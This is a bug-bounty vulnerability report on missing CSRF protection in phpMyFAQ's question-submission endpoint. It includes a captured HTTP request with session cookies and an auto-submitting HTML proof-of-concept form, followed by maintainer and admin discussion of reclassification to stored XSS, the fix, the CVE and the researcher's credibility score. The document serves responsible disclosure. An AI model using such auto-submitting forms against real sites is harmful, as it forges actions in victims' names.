Missing CSRF protection in thorsten/phpmyfaq

Valid

Reported on

Nov 24th 2022


Description

Any user can add a question in the FAQ section --> https://roy.demo.phpmyfaq.de/index.php?action=ask&category_id=0

This endpoint is vulnerable to CSRF. The request carries no anti-CSRF token (the captured body below contains only lang, name, email, category and question), so an attacker needs no prior knowledge of the victim or of their session. A successful CSRF submits a new question from the victim's browser, with the victim's session cookies attached.

Captured Request

POST /ajaxservice.php?action=savequestion HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=<ID-VALUE>; pmf_sid=22383; cookieconsent_status=dismiss; phpbb3_6zg4_u=1; phpbb3_6zg4_k=; phpbb3_6zg4_sid=68a52c0cd02a54757d476703488f677a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Sec-Gpc: 1
Te: trailers

lang=en&name=Demouser&email=demouser%40phpmyfaq.de&category=13&question=Execute-4?

Proof of Concept

<html>
  <body>
  <!-- Rewrites the address-bar path so the Referer shows only the attacker site's root, not the PoC page's path -->
  <script>history.pushState('', '', '/')</script>
    <!-- Same fields as the captured request; the victim's cookies are attached by the browser -->
    <form action="https://roy.demo.phpmyfaq.de/ajaxservice.php?action=savequestion" method="POST">
      <input type="hidden" name="lang" value="en" />
      <input type="hidden" name="name" value="Demouser" />
      <input type="hidden" name="email" value="demouser&#64;phpmyfaq&#46;de" />
      <input type="hidden" name="category" value="13" />
      <input type="hidden" name="question" value="Execute&#45;4&#63;" />
      <input type="submit" value="Submit request" />
    </form>
    <!-- Auto-submit so the victim only has to load the page -->
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

PoC Video

Link --> https://drive.google.com/file/d/1uIOoJ-mg17hZutheEbUW3umI1WlU_vLP/view?usp=sharing

Impact

An attacker can submit arbitrary questions, including abusive text, on behalf of any visitor whose browser is lured to the attacker's page; the submissions appear to come from the victim. The maintainer later noted in the thread below that the larger issue is the stored XSS reachable through this input in the admin section, which is why the CWE was changed to CWE-79.

Occurrences

(Sorry about this. It was tested on the demo version.)

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 2 months ago
Kiran PP modified the report
2 months ago
We have contacted a member of the thorsten/phpmyfaq team and are waiting to hear back 2 months ago
thorsten/phpmyfaq maintainer has acknowledged this report 2 months ago
Thorsten Rinne modified the CWE from Cross-Site Request Forgery (CSRF) to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') a month ago
Thorsten Rinne
a month ago

Maintainer


The CSRF isn't the big issue here, but the stored XSS in the admin section.

Kiran PP
a month ago

Researcher


If you get its potential, then you can track it as a bug and fix the case.

Regards,

The researcher has received a minor penalty to their credibility for misclassifying the vulnerability type: -1
Thorsten Rinne validated this vulnerability a month ago
Kiran PP has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.1.9 with commit e2ea33 a month ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 31st 2022
index.php#L0 has been validated
Kiran PP
a month ago

Researcher


Why can't we go for a CVE if it has a potential impact?

Just let me know

Kiran PP
a month ago

Researcher


@admin

The CSRF bug was there, but the major one was selected by the maintainer, so I received a minor penalty (unfair).

And my credibility has decreased to 2.7 even after this discovery. I hope you can make some adjustments and help boost my label from "pro" to "master".

regards,

Thorsten Rinne
a month ago

Maintainer


You can create a CVE if you like

Kiran PP
a month ago

Researcher


@admin @maintainer

Yeah, Then please assign a CVE for this one: CWE-79: Cross-site Scripting (XSS) - Stored

Kiran PP
a month ago

Researcher


@admin, Update??

Kiran PP
a month ago

Researcher


@Maintainer, Can you please do a favor for me? the admin is not responding here. Please track a CVE for this bug!

Regards,

Thorsten Rinne
a month ago

Maintainer


@7h3h4ckv157 how can I do that? Never did that before.

Kiran PP
a month ago

Researcher


@Maintainer I guess you can see that on your UI. Else, let's wait for @admin

Pavlos
a month ago

Admin


We will assign a CVE and publish it on December 31st :)

Kiran PP
a month ago

Researcher


Thanks, @admin

But please assist with this 👇🏻

The CSRF bug was there, but the major one was selected by the maintainer, so I received a minor penalty (unfair).

And my credibility decreased to 2.7 even after this discovery. I hope you can make some adjustments and help boost my label from "pro" to "master".

Thorsten Rinne gave praise a month ago
Thanks again to @7h3h4ckv157 for finding this issue.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Kiran PP
a month ago

Researcher


@maintainer I appreciate that. But I don't know what's wrong. Now my credibility has decreased from 2.7 to 2.6 🙂

@admin Seriously I've no idea about the backend function!

Pavlos
a month ago

Admin


If the CWE or CVSS are inaccurate, your credibility takes a minor hit. Let's resolve this on chatwoot via Chat with us :)

Ben Harvie
a month ago

Admin


As requested, this report will now receive a CVE on publication :)

Kiran PP
a month ago

Researcher


Thanks, @Ben 😄

Kiran PP
a month ago

Researcher


Please do share the details once published!

Regards,

Thorsten Rinne published this vulnerability a month ago
Kiran PP
9 days ago

Researcher


@admin

NIST: NVD Base Score: 5.4 MEDIUM

There's nothing that went wrong on my side. Kindly do something to fix my rank.

Regards,
